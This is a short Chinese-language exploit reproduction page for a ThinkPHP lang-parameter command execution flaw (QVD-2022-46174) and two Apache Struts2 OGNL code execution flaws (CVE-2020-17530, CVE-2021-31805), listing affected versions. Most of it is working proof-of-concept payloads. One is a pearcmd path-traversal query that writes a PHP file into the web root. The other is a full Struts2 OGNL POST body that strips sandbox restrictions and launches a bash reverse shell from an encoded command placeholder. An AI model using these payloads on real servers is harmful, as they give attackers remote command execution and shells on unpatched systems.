thinkphp lang命令执行--struts2 代码执行--(QVD-2022-46174)&&(CVE-2020-17530)&&(CVE-2021-31805)

thinkphp lang命令执行（QVD-2022-46174）

影响范围

6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x

漏洞复现

POC：

?+config-create+/&lang=../../../../../../../../usr/local/lib/php/pearcmd&/+/var/www/html/1.php

struts2 代码执行 （CVE-2020-17530）

影响范围

Apache Struts 2.0.0 - 2.5.25

漏洞复现

POC下载s2-062

struts2 代码执行 （CVE-2021-31805）

影响范围

Apache Struts 2.0.0 - 2.5.29

漏洞复现

Post： /s2_062/index.action

name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,反弹shell命令base64编码加url编码}|{base64,-d}|{bash,-i}'}))